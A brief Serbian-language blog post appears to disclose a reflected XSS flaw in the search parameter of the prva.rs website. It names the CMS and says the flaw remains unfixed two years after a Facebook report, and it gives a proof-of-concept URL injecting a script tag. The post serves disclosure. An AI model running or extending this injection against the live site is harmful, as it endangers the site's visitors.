| tags: [ xss prva.rs cross site scripting tv ] categories: [security ]
Prva Srpska Televizija - XSS
Prijavljivanje propusta
Najveci problem je kako prijvatiti propust jer nisam uspeo da nadjem neki email gde mogu da posaljem detalje, pa sam na kraju odlucio da ih kontaktiram preko facebook stranice, ali to nije proslo slavno, tj. propust jos uvek postoji, a prijavljen je pre vise od 2 godine.
Detalji propusta
Metoda: GET
CMS: NoraCMS / Inbox-Online
Ranjiv parametar: searchText
PoC: http://www.prva.rs/search.html?lang=sr&searchText=<script>alert(1)</script>&ok=